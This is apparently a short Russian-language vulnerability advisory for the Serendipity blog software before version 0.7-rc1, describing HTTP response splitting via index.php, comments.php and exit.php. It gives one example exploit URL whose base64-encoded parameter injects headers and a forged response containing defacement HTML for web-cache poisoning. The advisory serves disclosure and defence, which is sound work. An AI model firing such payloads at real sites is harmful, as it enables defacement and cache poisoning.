Программа: Serendipity версии до 0.7-rc1 

Удаленный атакующий может выполнить HTTP response splitting атаку.
Удаленный атакующий может изменить содержимое страницы с целью кеширования злонамеренного кода в одном из web кешей.
Уязвимость существует при обработке запрашиваемого URI в index.php и HTTP реферера в
'comments.php'.

Пример:

http://[target]/serendipity/exit.php?url=DQpDb25uZWN0a W9uOiBLZWVwLUFsaXZlDQpDb250ZW50LUxlbmd0aD
ogMA0KDQpIVFRQLzEuMCAyMDAgT0sNCkNvbnRlbn
QtTGVuZ3RoOiAyMQ0KQ29udGVudC1UeXBlOiB0ZXh
0L2h0bWwNCg0KPGh0bWw%2bKmRlZmFjZWQqPC9o dG1sPg%3d%3d

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии